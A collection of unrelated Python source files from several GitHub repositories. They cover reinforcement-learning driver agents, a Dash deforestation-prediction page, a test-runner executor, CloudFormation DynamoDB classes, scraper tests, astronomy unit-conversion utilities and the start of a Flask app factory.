policy_loss = weighting * delta * log_pi + self.entropy_weight*entropy
policy_loss = policy_loss.mean()
self.optimizer.zero_grad()
policy_loss.backward()
torch.nn.utils.clip_grad_norm_(self.network.parameters(), 1.)
self.optimizer.step()
def take_action(self, curr_state):
"""
Return an action given the current based on the policy
Parameters
----------
curr_state: list of strings
Current state vector
Returns
-------
action: int
The action to be taken
policy: Categorical
The action policy distribution given form the network
"""
# TODO: make machine worse than human+machine e.g. same feature value for road-grass
set_curr_state = curr_state
if self.setting == 2 or self.setting == 6:
set_curr_state = list(map(lambda x : 'road' if x=='grass' else x, curr_state ))
state_feature_vector = Environment.state2features(set_curr_state, self.n_state_features)
actions_logits = self.network(state_feature_vector)
# actions_logits[actions_logits!=actions_logits] = 0
valid_action_logits = actions_logits
# print("logits", actions_logits)
# # Never choose wall
# if len(curr_state) > 1:
# if curr_state[1] == 'wall':
# valid_action_logits = actions_logits[1:]
# elif curr_state[3] == 'wall':
# valid_action_logits = actions_logits[:2]
policy = torch.distributions.Categorical(logits=valid_action_logits)
valid_action_probs = policy.probs
if (policy.probs < 1e-5).any():
valid_action_probs = valid_action_probs.clamp(1e-5,1-1e-5)
valid_action_probs = valid_action_probs/valid_action_probs.sum()
if len(curr_state) > 1:
if curr_state[1] == 'wall':
valid_action_probs = valid_action_probs[1:].clamp(1e-5,1-1e-5)
valid_action_probs = valid_action_probs/valid_action_probs.sum()
valid_action_probs = torch.squeeze(torch.stack([torch.tensor(0),valid_action_probs[0], valid_action_probs[1]]))
elif curr_state[3] == 'wall':
valid_action_probs = valid_action_probs[:2].clamp(1e-5,1-1e-5)
valid_action_probs = valid_action_probs/valid_action_probs.sum()
valid_action_probs = torch.squeeze(torch.stack([valid_action_probs[0], valid_action_probs[1], torch.tensor(0)]))
# valid_action_probs = valid_action_probs.clamp(1e-5, 1.)
valid_policy = torch.distributions.Categorical(probs=valid_action_probs)
# print("a", valid_action_probs)
action = valid_policy.sample().item()
if len(curr_state) > 1:
if curr_state[1] == 'wall':
assert action != 0
elif curr_state[3] == 'wall':
assert action != 2
return action , valid_policy
# needed to pickle human
def dd_init():
return [0]*3
class NoisyDriverAgent(Agent):
def __init__(self, env: Environment, prob_wrong: float, setting=1, noise_sw=.0, c_H=0., p_ignore_car=0.5):
"""
A noisy driver, which chooses the cell with the lowest noisy estimated cost.
Parameters
----------
env: Environment
prob_wrong : float
Probability of picking action at random
noise_sw : float
Standard deviation of the Gaussian noise beacuse of switching from Machine to Human
"""
super(NoisyDriverAgent, self).__init__()
self.p_ignore_car = p_ignore_car
self.prob_wrong = prob_wrong
self.noise_sw = noise_sw
self.type_costs = { **env.type_costs, 'wall':np.inf}
self.control_cost = c_H
self.trainable = False
self.setting = setting
self.actual = True
self.policy_approximation = defaultdict(dd_init)
def update_policy(self, state, action, grid_id):
"""Update policy approximation, needed for the off policy stage"""
# The human action in reality depends only on next row
human_obs = tuple(state)
self.policy_approximation[grid_id,human_obs][action]+=1
def get_policy_approximation(self, state, action, grid_id):
""" The approximated action policy distribution given the state """
human_obs = tuple(state)
total_state_visit = sum(self.policy_approximation[grid_id,human_obs])
p_human_a_s = self.policy_approximation[grid_id,human_obs][action] / total_state_visit
return p_human_a_s
def get_actual_policy(self, state, next_state):
greedy_cell = min(state[1:4], key=lambda x: self.type_costs[x])
next_cell = next_state[0]
is_greedy = next_cell == greedy_cell
n_cell = 2 if 'wall' in state[1:4] else 3
n_opt = sum(1 for cell in state[1:4] if cell == greedy_cell)
if self.setting == 1:
if is_greedy:
return (1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
else:
return self.prob_wrong/n_cell
elif self.setting != 1:
n_road = sum(1 for cell in state[1:4] if cell == 'road')
n_car = sum(1 for cell in state[1:4] if cell == 'car')
if is_greedy:
if next_cell == 'road':
mu_a_s = (1 - self.p_ignore_car)*(1 - self.prob_wrong)/n_road + self.p_ignore_car*(1 - self.prob_wrong)/(n_car + n_road) + self.prob_wrong/n_cell
return mu_a_s
elif next_cell == 'car':
return 1/n_car
else:
if 'car' in state[1:4]:
return (1 - self.p_ignore_car)*(1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
else:
return (1 - self.prob_wrong)/n_opt + self.prob_wrong/n_cell
else:
if next_cell =='car':
return self.p_ignore_car * (1 - self.prob_wrong)/(n_road +n_car) + self.prob_wrong/n_cell
else:
return self.prob_wrong/n_cell
def get_policy(self, state, action, grid_id, next_state):
if self.actual:
return self.get_actual_policy(state, next_state)
else:
return self.get_policy_approximation(state, action, grid_id)
def take_action(self, curr_state, switch=False):
'''
current state in form of ['road', 'no-car','car','road','car', ...]
human considers only next row, not the others
'''
# if end of episode is reached
if len(curr_state) < 4:
return random.randint(0,2)
switch_noise = self.noise_sw if switch else 0.
p_choose = random.random()
p_ignore = random.random()
curr_state_for_human = copy(curr_state)
# ignore stone when switching
if self.setting >= 4:
for i, cell_type in enumerate(curr_state[1:4]):
if cell_type == 'car' and switch:
curr_state_for_human[i+1] = 'road'
if self.setting!=6:
for i, cell_type in enumerate(curr_state[1:4]):
if cell_type == 'car' and p_ignore < self.p_ignore_car:
curr_state_for_human[i+1] = 'road'
# noisy_next_cell_costs = [self.type_costs[nxt_cell_type] + random.gauss(0,estimation_noise) + random.gauss(0, switch_noise) if nxt_cell_type!='wall' else np.inf for nxt_cell_type, estimation_noise in zip(curr_state[2:5], estimation_noises)]
noisy_next_cell_costs = [self.type_costs[nxt_cell_type] for nxt_cell_type in curr_state_for_human[1:4]]
if p_choose < self.prob_wrong:
if curr_state[1] == 'wall':
action = random.choices(range(2), [1/2, 1/2])[0] + 1
elif curr_state[3] == 'wall':
action = random.choices(range(2), [1/2, 1/2])[0]
else:
action = random.choices(range(3), [1/3, 1/3, 1/3])[0]
return action
min_estimated_cost = np.min(noisy_next_cell_costs)
# ties are broken randomly
possible_actions = np.argwhere(noisy_next_cell_costs == min_estimated_cost).flatten()
n_possible_actions = possible_actions.size
action = random.choices(possible_actions, [1/n_possible_actions]*n_possible_actions)[0]
return action
class RandomDriverAgent(Agent):
def __init__(self):
"""A random driver """
super(RandomDriverAgent, self).__init__()
self.trainable = False
self.control_cost = 0.0
self.policy_approximation = defaultdict(dd_init)
def update_policy(self, state, action):
"""Update policy approximation, needed for the off policy stage"""
# The human action in reality depends only on next row
human_obs = tuple(state )
self.policy_approximation[human_obs][action]+=1
def get_policy_approximation(self, state, action):
""" The approximated action policy distribution given the state """
human_obs = tuple(state )
total_state_visit = sum(self.policy_approximation[human_obs])
p_human_a_s = self.policy_approximation[human_obs][action] / total_state_visit
return p_human_a_s
def take_action(self, curr_state, switch=False):
action = random.choices(range(3), [1/3, 1/3, 1/3])[0]
return action
class OptimalAgent():
def __init__(self, env: GridWorld, control_cost):
self.env = env
self.control_cost = control_cost
self.p = np.zeros(shape=(self.env.width,self.env.height, 3, self.env.width,self.env.height))
for y in range(self.env.height):
for x in range(self.env.width):
for a in range(3):
nxt_x,nxt_y = self.env.next_coords(x,y,a)
self.p[x,y,a,nxt_x,nxt_y] = 1.
self.policy = self.val_itr()
def take_action(self, time, coords):
x,y = coords
return random.choices(range(3), self.policy[time][x][y])[0]
def eval(self, n_try=1, plt_path=None):
total_cost = []
for i in range(n_try):
self.env.reset()
traj_cost = 0
time = 0
while True:
cur_coords = self.env.current_coord
action = self.take_action(time, cur_coords)
_, cost, finished = self.env.step(action)
if finished:
break
traj_cost+=cost + self.control_cost
if plt_path is not None:
plt_path.add_line(cur_coords, self.env.current_coord, 'red')
total_cost.append(traj_cost)
return np.mean(total_cost)
def val_itr(self):
ep_l = self.env.height
n_ac = 3
# q_val[time][state][action]
q_val = np.zeros(shape=(ep_l, self.env.width,self.env.height, n_ac))
# q_min[time][state]
q_min = np.zeros(shape=(ep_l + 1, self.env.width,self.env.height))
# policy[time][state][action]
policy = np.zeros(shape=(ep_l, self.env.width,self.env.height, n_ac))
for i in range(ep_l):
t = ep_l - i - 1
for y in range(self.env.height):
for x in range(self.env.width):
for a in range(n_ac):
nxt_x,nxt_y = self.env.next_coords(x,y,a)
q_val[t][x][y][a] = self.env.type_costs[self.env.cell_types[nxt_x,nxt_y]] + np.sum(self.p[x,y,a]* q_min[t + 1])
best_actions = np.where(q_val[t][x][y] == np.min(q_val[t][x][y]))[0]
policy[t][x,y][best_actions] = 1 / len(best_actions)
q_min[t][x][y] = np.min(q_val[t][x][y])
return policy | ElenStr/human-machine-switching | agent/agents.py | agents.py | py | 14,470 | python | en | code | 0 | github-code | 36 |
75216777705 | from joblib import load
pipeline1 = load('assets/xgb1.joblib')
pipeline2 = load('assets/xgb2.joblib')
# Imports from 3rd party libraries
import dash
import dash_bootstrap_components as dbc
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
from xgboost import XGBRegressor
import pandas as pd
import numpy as np
import category_encoders as ce
import plotly.graph_objects as go
# Imports from this application
from app import app
## for chloropleth mapbox usage
mapboxt = open("./amazon/token.txt").read()
# style for controls
style = {'padding': '1.5em'}
# controls start here
layout = html.Div([
dcc.Markdown("""
### Predict
Use the controls below to update your predicted location, based on
area in km^2, day, month, year and state.
*(Predictions based on sample dataset using XGboost model. Check the [Process](https://amazon-deforestation.herokuapp.com/process) page why.)*
"""),
html.Div([
dcc.Markdown('###### Area in km^2'),
dcc.Slider(
id='area',
min=0.062,
max=1.440,
step=0.040,
value=0.090,
marks={n: f'{n:.2f}' for n in np.arange(0.006, 1.440, 0.040)}
),
], style=style),
html.Div([
dcc.Markdown('###### Day'),
dcc.Slider(
id='day',
min=1,
max=30,
step=1,
value=25,
marks={n: str(n) for n in range(1, 31, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### Month'),
dcc.Slider(
id='month',
min=1,
max=12,
step=1,
value=7,
marks={n: str(n) for n in range(1, 13, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### Year'),
dcc.Slider(
id='year',
min=2008,
max=2025,
step=1,
value=2017,
marks={n: str(n) for n in range(2008, 2025, 1)}
),
], style=style),
html.Div([
dcc.Markdown('###### State'),
dcc.Dropdown(
id='state',
options=[{'label': state, 'value': state} for state in ['Para', 'Mato Grosso', 'Rondonia', 'Amazonas','Maranhao', 'Acre', 'Roraima', 'Amapa', 'Tocantins']],
value='Para'
),
], style=style),
# Scatter mapbox plot with predictions
html.Div([
dcc.Graph(id='graph')
],
style=style)
])
# get the inputs
@app.callback(
# Output(component_id='prediction-content', component_property='children'),
Output(component_id='graph', component_property='figure'),
[Input(component_id='area', component_property='value'),
Input(component_id='day', component_property='value'),
Input(component_id='month', component_property='value'),
Input(component_id='year', component_property='value'),
Input(component_id='state', component_property='value')])
# apply model
def predict(area, day, month, year, state):
df = pd.DataFrame(
columns=['areakm_squared', 'day', 'month', 'year', 'states'],
data=[[area, day, month, year, state]])
y_pred_1 = pipeline1.predict(df)[0]
y_pred_2 = pipeline2.predict(df)[0]
# print(y_pred_1)
# print(y_pred_2)
results = [y_pred_1, y_pred_2]
graphing = {
'data': [{
'type': 'scattermapbox',
'lat': [results[0]],
'lon': [results[1]],
'name':'Predicted location of deforested area',
'showlegend': True,
'mode': 'markers',
'hoverinfo': 'all',
'text':f'predicted location latitude:{results[0]}, longitude:{results[1]}',
'marker':go.scattermapbox.Marker(
size=30,
color='#E51313',
opacity=0.8),
'hovertemplate': f'Predicted location: latitude:{results[0]:.4f}, longitude:{results[1]:.4f} with {area} km^2'
}],
'layout': go.Layout(title_text= f'Predictions for state <b>{state}</b><br> latitude:<b>{results[0]:.4f}</b>, longitude:<b>{results[1]:.4f}</b> with <b>{area}</b> km^2',
title_x=0.05, width =1000, height=660,
mapbox = dict(center= dict(lat=-5.977402, lon=-58.97948),
accesstoken= mapboxt,
pitch=0,
zoom=4,
style='light'
),
mapbox_style = "streets",
showlegend=True,
legend=dict(x=0.7, y=1.15))
}
return go.Figure(data=graphing['data'], layout=graphing['layout'])
| tigju/Amazon-Deforestation-Prediction-App | pages/predictions.py | predictions.py | py | 4,861 | python | en | code | 1 | github-code | 36 |
40364806637 | import os
import subprocess
from testbot.executors.env_test import EnvironmentTestExecutor
from testbot.executors.errors import ExecutorError
from testbot.task import BotTask
class ScriptEnvironmentTestExecutor(EnvironmentTestExecutor):
def __init__(self, task: BotTask, submission_id: int, test_config_id: int):
super(ScriptEnvironmentTestExecutor, self).__init__(task=task, submission_id=submission_id,
test_config_id=test_config_id)
self.run_script = None
self.combined_env_vars = {}
def prepare(self):
super(ScriptEnvironmentTestExecutor, self).prepare()
config_type = self.test_config['type']
if config_type != 'run-script':
raise ExecutorError('invalid config type for %s: %s' % (self.__class__.__name__, config_type))
# Look for 'run.sh' and we will run it in the current environment directly, which has no system isolation or
# time/resource/network restrictions.
run_script = os.path.join(self.work_folder, 'run.sh')
if not os.path.isfile(run_script):
raise ExecutorError('Test script "run.sh" not found')
self.run_script = run_script
# make a copy of the current environment and add additional env vars
env = os.environ.copy()
env.update(self.env_vars)
self.combined_env_vars = env
def run(self):
super(ScriptEnvironmentTestExecutor, self).run()
proc_result = subprocess.run(['bash', os.path.abspath(self.run_script)], cwd=self.work_folder,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=self.combined_env_vars)
if proc_result.stdout:
self.files_to_upload['stdout.txt'] = proc_result.stdout
if proc_result.stderr:
self.files_to_upload['stderr.txt'] = proc_result.stderr
return_code = proc_result.returncode
if return_code:
if return_code == self.EXIT_STATUS_TIMEOUT:
raise TimeoutError('Test timeout')
if return_code == self.EXIT_STATUS_KILLED:
raise OSError('Test killed')
errors = self.extract_errors(proc_result.stderr)
if errors:
raise RuntimeError(' \n'.join(errors))
raise RuntimeError('Test returned exit code %d' % return_code)
return self.extract_result(proc_result.stdout)
| tjumyk/submit-testbot | testbot/executors/env_test_script.py | env_test_script.py | py | 2,449 | python | en | code | 0 | github-code | 36 |
15178487279 | import warnings
from . import AWSHelperFn, AWSObject, AWSProperty
warnings.warn("This module is outdated and will be replaced with "
"troposphere.dynamodb2. Please see the README for "
"instructions on how to prepare for this change.")
class AttributeDefinition(AWSHelperFn):
def __init__(self, name, type):
self.data = {
'AttributeName': name,
'AttributeType': type,
}
def JSONrepr(self):
return self.data
class Key(AWSProperty):
def __init__(self, AttributeName, KeyType):
self.data = {
'AttributeName': AttributeName,
'KeyType': KeyType,
}
def JSONrepr(self):
return self.data
class ProvisionedThroughput(AWSHelperFn):
def __init__(self, ReadCapacityUnits, WriteCapacityUnits):
self.data = {
'ReadCapacityUnits': ReadCapacityUnits,
'WriteCapacityUnits': WriteCapacityUnits,
}
def JSONrepr(self):
return self.data
class Projection(AWSHelperFn):
def __init__(self, ProjectionType, NonKeyAttributes=None):
self.data = {
'ProjectionType': ProjectionType
}
if NonKeyAttributes is not None:
self.data['NonKeyAttributes'] = NonKeyAttributes
def JSONrepr(self):
return self.data
class GlobalSecondaryIndex(AWSHelperFn):
def __init__(self, IndexName, KeySchema, Projection,
ProvisionedThroughput):
self.data = {
'IndexName': IndexName,
'KeySchema': KeySchema,
'Projection': Projection,
'ProvisionedThroughput': ProvisionedThroughput,
}
def JSONrepr(self):
return self.data
class LocalSecondaryIndex(AWSHelperFn):
def __init__(self, IndexName, KeySchema, Projection,
ProvisionedThroughput):
self.data = {
'IndexName': IndexName,
'KeySchema': KeySchema,
'Projection': Projection,
}
def JSONrepr(self):
return self.data
class StreamSpecification(AWSProperty):
props = {
'StreamViewType': (basestring, True),
}
class Table(AWSObject):
resource_type = "AWS::DynamoDB::Table"
props = {
'AttributeDefinitions': ([AttributeDefinition], True),
'GlobalSecondaryIndexes': ([GlobalSecondaryIndex], False),
'KeySchema': ([Key], True),
'LocalSecondaryIndexes': ([LocalSecondaryIndex], False),
'ProvisionedThroughput': (ProvisionedThroughput, True),
'StreamSpecification': (StreamSpecification, False),
'TableName': (basestring, False),
}
| farazrehman/aws-resources | CloudFormation/nash/lib/python2.7/site-packages/troposphere/dynamodb.py | dynamodb.py | py | 2,681 | python | en | code | 0 | github-code | 36 |
31833081682 | import pytest
from bs4 import BeautifulSoup
import nerdtracker_client.constants.stats as ntc_stats
from nerdtracker_client.scraper import (
create_scraper,
parse_tracker_html,
retrieve_page_from_tracker,
retrieve_stats,
retrieve_stats_multiple,
)
class TestScraper:
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_page_from_tracker(
self, valid_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, valid_activision_user_string, cold_war_flag=True
)
# Check that the soup object does not contain a failed request message
failed_string = "Enable JavaScript and cookies to continue"
assert failed_string not in soup.text
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_invalid_page_from_tracker(
self, invalid_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, invalid_activision_user_string, cold_war_flag=True
)
# Check that the soup object contains a failed stats message
failed_string = "stats not found"
assert failed_string in soup.text
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_empty_page_from_tracker(
self, empty_activision_user_string
) -> None:
scraper = create_scraper()
soup = retrieve_page_from_tracker(
scraper, empty_activision_user_string, cold_war_flag=True
)
# Check that the soup object contains a failed stats message
failed_string = "404 Page not Found"
assert failed_string in soup.text
class TestParseTrackerHtml:
def test_parse_tracker_html(
self, html_page: str, joy_stats: ntc_stats.StatColumns
) -> None:
soup = BeautifulSoup(html_page, "html.parser")
stats = parse_tracker_html(soup)
assert stats == joy_stats
class TestRetrieve:
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_stats(
self,
valid_activision_user_string: str,
joy_stats: ntc_stats.StatColumns,
) -> None:
stats = retrieve_stats(valid_activision_user_string, cold_war_flag=True)
if stats == {}:
pytest.skip("Cloudflare challenge detected, skipping test")
assert stats == joy_stats
@pytest.mark.slow
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_retrieve_stats_multiple(
self,
activision_user_string_list: list[str],
stat_list: list[ntc_stats.StatColumns | dict | None],
) -> None:
stats = retrieve_stats_multiple(
activision_user_string_list, cold_war_flag=True
)
assert stats == stat_list
| cesaregarza/Nerdtracker_Client | nerdtracker_client/tests/test_scraper.py | test_scraper.py | py | 2,972 | python | en | code | 0 | github-code | 36 |
476733440 | from __future__ import (absolute_import, division, print_function,
unicode_literals)
import array, os, re
import numpy as np
import math
import sys
# some useful constants
c = 299792458 # speed of light (m/sec)
m_per_au = 1.49598e11 # meters per astronomical unit
au_per_pc = 3600 * 180 / np.pi # AUs per parsec
def to_years(to_convert, units='gyrs', reverse=False):
""" res = ezgal.utils.to_years( to_convert, units='gyrs', reverse=False )
Converts the given time to years from the given units. If reverse=True then it converts from years into the given units
:param to_convert: The time to convert
:param units: The units to convert the time to
:param reverse: Converts from years if True
:type to_convert: int, float
:type units: string
:type reverse: bool
:returns: The converted time
:rtype: int, float
:Example:
>>> import ezgal
>>> ezgal.utils.to_years( 1e-9, units='gyrs' )
1.0
**units**
Available units are (case insensitive):
================== ====================
Name Units
================== ====================
gigayears,gyrs,gyr Gigayears
megayears,myrs,myr Megayears
years,yrs,yr Years
days,day Days
seconds,secs,sec,s Seconds
log log10(years)
================== ====================
.. seealso:: :func:`ezgal.utils.convert_time`
"""
units = units.lower()
factor = 0
to_convert = np.asarray(to_convert)
if units == 'gigayears' or units == 'gyrs' or units == 'gyr': factor = 1e9
if units == 'megayears' or units == 'myrs' or units == 'myr': factor = 1e6
if units == 'years' or units == 'yrs' or units == 'yr': factor = 1
if units == 'days' or units == 'day': factor = 1.0 / 365.0
if units == 'seconds' or units == 'secs' or units == 'sec' or units == 's':
factor = 1.0 / (365.0 * 86400)
if factor != 0:
if reverse: factor = 1.0 / factor
return to_convert * factor
if units == 'log':
if reverse: return np.log10(to_convert)
return 10.0**to_convert
raise NameError('Units of %s are not recognized!' % units)
def convert_time(to_convert, incoming='secs', outgoing='gyrs'):
""" res = ezgal.utils.convert_time( to_convert, incoming='secs', outgoing='gyrs' )
Converts the given time from the incoming units to the outgoing units.
:param to_convert: The length to convert
:param incoming: The units to convert the time from
:param outgoing: The units to convert the time to
:type to_convert: int, float
:type incoming: string
:type outgoing: string
:returns: The converted time
:rtype: int, float
:Example:
>>> import ezgal
>>> ezgal.utils.convert_time( 1, incoming='years', outgoing='s' )
31536000.0
.. seealso:: see :func:`ezgal.utils.to_years` for available units."""
return to_years(
to_years(to_convert, units=incoming),
units=outgoing,
reverse=True)
def to_meters(to_convert, units='a'):
""" res = ezgal.utils.to_meters( to_convert, units='a' )
Converts a length from the given units to meters
:param to_convert: The length to convert
:param units: The units to convert the length to
:type to_convert: int, float
:type units: string
:returns: The converted length
:rtype: int, float
:Example:
>>> import ezgal
>>> ezgal.utils.to_meters( 1e10, units='a' )
1.0
**units**
Available units are (case insensitive):
================= ====================
Name Units
================= ====================
a,angstroms Angstroms
nm,nanometers Nanometers
um,microns Microns
mm,millimeters Millimeters
cm,centimeters Centimeters
m,meters Meters
km,kilometers Kilometers
au Astronomical Units
pc,parsecs Parsecs
kpc, kiloparsecs Kiloparsecs
mpc, megaparsecs Megaparsecs
================= ====================
.. seealso:: :func:`ezgal.utils.convert_length`
"""
units = units.lower()
to_convert = np.asarray(to_convert)
if units == 'angstroms' or units == 'a': return to_convert / 1e10
if units == 'nanometers' or units == 'nm': return to_convert / 1e9
if units == 'microns' or units == 'um': return to_convert / 1e6
if units == 'millimeters' or units == 'mm': return to_convert / 1e3
if units == 'centimeters' or units == 'cm': return to_convert / 1e2
if units == 'meters' or units == 'm': return to_convert
if units == 'kilometers' or units == 'km': return to_convert * 1000.0
if units == 'au': return to_convert * m_per_au
if units == 'parsecs' or units == 'pc':
return to_convert * m_per_au * au_per_pc
if units == 'kilparsecs' or units == 'kpc':
return to_convert * m_per_au * au_per_pc * 1000.0
if units == 'megaparsecs' or units == 'mpc':
return to_convert * m_per_au * au_per_pc * 1e6
raise NameError('Units of %s are not recognized!' % units)
def to_hertz(to_convert, units='a'):
""" res = ezgal.utils.to_hertz( to_convert, units='Angstroms' )
Converts the given wavelength (in the given units) to hertz.
:param to_convert: The wavelength to convert
:param units: The units the wavelength is in
:type to_convert: int, float
:type units: string
:returns: The converted frequency
:rtype: float
:Example:
>>> import ezgal
>>> ezgal.utils.to_hertz( 1000, units='a' )
2997924580000000.0
.. seealso::
see :func:`ezgal.utils.to_meters` for list of available units
Also see :func:`ezgal.utils.to_lambda`
"""
return (c / to_meters(1.0, units=units)) / np.asarray(to_convert)
def to_lambda(to_convert, units='a'):
""" res = ezgal.utils.to_lambda( to_convert, units='a' )
Converts the given frequency to a wavelength in the given units.
:param to_convert: The frequency to convert
:param units: The desired units of the output wavelength
:type to_convert: int, float
:type units: string
:returns: The converted wavelength
:rtype: float
:Example:
>>> import ezgal
>>> ezgal.utils.to_lambda( 2997924580000000.0, units='a' )
1000.0
.. seealso::
see :func:`ezgal.utils.to_meters` for list of available units
Also see :func:`ezgal.utils.to_hertz`
"""
return (c / to_meters(1.0, units=units)) / np.asarray(to_convert)
def convert_length(to_convert, incoming='m', outgoing='a'):
""" res = ezgal.utils.convert_length( to_convert, incoming='m', outgoing='a' )
converts a length from the incoming units to the outgoing units.
:param to_convert: The length to convert
:param incoming: The units to convert the length from
:param outgoing: The units to convert the length to
:type to_convert: int, float
:type incoming: string
:type outgoing: string
:returns: The converted length
:rtype: int, float
:Example:
>>> import ezgal
>>> ezgal.utils.convert_length( 1, incoming='pc', outgoing='au' )
206264.80624709636
.. seealso:: see :func:`ezgal.utils.to_meters` for available units.
"""
return to_meters(to_convert, units=incoming) / to_meters(1.0,
units=outgoing)
def rascii(filename, silent=False):
""" res = ezgal.utils.rascii( filename, silent=False )
Reads in numeric data stored in an ascii file into a numpy array.
:param filename: The name of the ascii file
:param silent: Whether or not to output basic file information
:type filename: string
:type silent: bool
:returns: A numpy array
:rtype: np.array()
.. warning::
Skips any lines that have any non-numeric data, and any data lines with a different number of columns than the first data line.
.. seealso:: :func:`ezgal.utils.wascii`
"""
# accept an open filepointer or a filename
if type(filename) == type(''):
file = open(filename, 'r')
else:
file = filename
found = False
nlines = 0
ngood = 0
for line in file:
nlines += 1
if re.search('^\s*$', line) or re.search('[^\s\d.eEdD\-+]', line):
continue
parts = line.split()
nparts = len(parts)
if not found:
found = True
allowed = nparts
res = parts
continue
if nparts != allowed: continue
ngood += 1
res.extend(parts)
ngood += 1
if ngood == 0: return np.array([])
arr = np.array(res)
arr.shape = (ngood, -1)
return np.array(res).reshape(ngood, -1).astype('float')
def wascii(array, filename, formats, blank=False, header=None, names=None):
""" ezgal.utils.wascii( array, filename, formats, blank=False, header=False, names=None )
Writes out a np array to a well formated file.
:param array: The numpy array to write out
:param filename: The name of the output file
:param formats: A list of python string formats (one for each column)
:param blank: Whether or not to output a blank line at the end of the file
:param header: A string or list of strings to write out as the header
:param names: A list of column names with which to build a header
:type array: a 2D numpy array
:type filename: string
:type formats: string,list
:type blank: bool
:type header: string,list
:type blank: string,list
"""
table = np.asarray(array)
if table.ndim != 2: raise NameError('I was expecting a 2D data table')
nrows, ncols = table.shape
if type(formats) is str:
formats = [formats] * ncols
if ncols != len(formats):
raise NameError(
'Number of supplied formats does not match number of table columns!')
# if column names were provided, create a header that list column names/numbers
if names is not None:
if len(names) != ncols:
raise NameError(
'Number of supplied column names does not match number of table columns!')
if header is None: header = []
header.append('# Column Descriptions:')
name_format = '# %0' + ('%1d' %
(math.ceil(math.log10(ncols)))) + 'd: %s'
for i in range(ncols):
header.append(name_format % (i + 1, names[i]))
if (header is not None) & isinstance(header, list):
header = "\n".join(header)
if ncols == 1:
file = "\n".join(formats[0] % val for val in table.ravel())
else:
strings = [''] * nrows
for i in range(nrows):
strings[i] = ' '.join(
[format % val for format, val in zip(formats, table[i, :])])
file = "\n".join(strings)
# filename can be a filename or file pointer
# in the case of a file pointer don't close it
if type(filename) == type(''):
fh = open(filename, 'wb')
do_close = True
else:
fh = filename
do_close = False
if header is not None: fh.write(header + "\n")
fh.write(file)
if blank: fh.write("\n")
if do_close:
fh.close()
def _read_binary(fhandle, type='i', number=1, swap=False):
'''
res = ezgal.utils._read_binary( fhandle, type='i', number=1, swap=False )
reads 'number' binary characters of type 'type' from file handle 'fhandle'
returns the value (for one character read) or a numpy array.
set swap=True to byte swap the array after reading
'''
if (sys.version_info >= (3, 0)) & (type == 'c'):
## unsigned char in python 2.
## https://docs.python.org/2/library/array.html
## https://docs.python.org/3/library/array.html
## type = 'B' ## unsigned char in python 3.
## type = 'b' ## signed char in python 3.
import warnings
type = 'B'
warnings.warn('Reassigning unsigned char type (c to B) as per python 3.')
arr = array.array(type)
arr.fromfile(fhandle, number)
if swap:
arr.byteswap()
if len(arr) == 1:
return arr[0]
else:
return np.asarray(arr)
def read_ised(file):
""" ( seds, ages, vs ) = ezgal.utils.read_ised( file )
Read a bruzual and charlot binary ised file.
:param file: The name of the ised file
:type file: string
:returns: A tuple containing model data
:rtype: tuple
.. note::
All returned variables are numpy arrays. ages and vs are one
dimensional arrays, and seds has a shape of (vs.size, ages.size)
**units**
Returns units of:
=============== ===============
Return Variable Units
=============== ===============
seds Ergs/s/cm**2/Hz
ages Years
vs Hz
=============== ===============
"""
if not (os.path.isfile(file)):
raise ValueError('The specified model file was not found!')
print('Reading .ised: %s' % str(file))
# open the ised file
fh = open(file, 'rb')
# start reading
junk = _read_binary(fh)
nages = _read_binary(fh)
# first consistency check
if nages < 1 or nages > 2000:
raise ValueError(
'Problem reading ised file - unexpected data found for the number of ages!')
# read ages
ages = np.asarray(_read_binary(fh, type='f', number=nages))
# read in a bunch of stuff that I'm not interested in but which I read like
# this to make sure I get to the right spot in the file
junk = _read_binary(fh, number=2)
iseg = _read_binary(fh, number=1)
if iseg > 0:
junk = _read_binary(fh, type='f', number=6 * iseg)
junk = _read_binary(fh, type='f', number=3)
junk = _read_binary(fh)
junk = _read_binary(fh, type='f')
junk = _read_binary(fh, type='c', number=80)
junk = _read_binary(fh, type='f', number=4)
junk = _read_binary(fh, type='c', number=160)
junk = _read_binary(fh)
junk = _read_binary(fh, number=3)
# read in the wavelength data
nvs = _read_binary(fh)
# consistency check
if nvs < 10 or nvs > 12000:
raise ValueError('Problem reading ised file - unexpected data found for the number of wavelengths!')
# read wavelengths and convert to frequency (comes in as Angstroms)
# also reverse the array so it will be sorted after converting to frequency
ls = _read_binary(fh, type='f', number=nvs)[::-1]
# create an array for storing SED info
seds = np.zeros((nvs, nages))
# now loop through and read in all the ages
for i in range(nages):
junk = _read_binary(fh, number=2)
nv = _read_binary(fh)
if nv != nvs:
raise ValueError(
'Problem reading ised file - unexpected data found while reading seds!')
seds[:, i] = _read_binary(fh, type='f', number=nvs)[::-1]
nx = _read_binary(fh)
junk = _read_binary(fh, type='f', number=nx)
# now convert the seds from Lo/A to ergs/s/Hz
seds *= 3.826e33
seds *= ls.reshape((nvs, 1))**2.0
seds /= convert_length(c, outgoing='a')
# convert from ergs/s/Hz to ergs/s/Hz/cm^2.0 @ 10pc
seds /= 4.0 * np.pi * convert_length(10, incoming='pc', outgoing='cm')**2.0
vs = to_hertz(ls)
fh.close()
# sort in frequency space
sinds = vs.argsort()
return (seds[sinds, :], ages, vs[sinds])
| cmancone/easyGalaxy | ezgal/utils.py | utils.py | py | 15,023 | python | en | code | 14 | github-code | 36 |
1154715752 | import os
from flask import Flask
from src.models import migrate, db
from src.command import data_load_command
from src.api import api
config_variable_name = 'FLASK_CONFIG_PATH'
default_config_path = os.path.join(os.path.dirname(__file__), 'config/local.py')
os.environ.setdefault(config_variable_name, default_config_path)
def create_app(config_file=None, settings_override=None):
app = Flask(__name__)
if config_file:
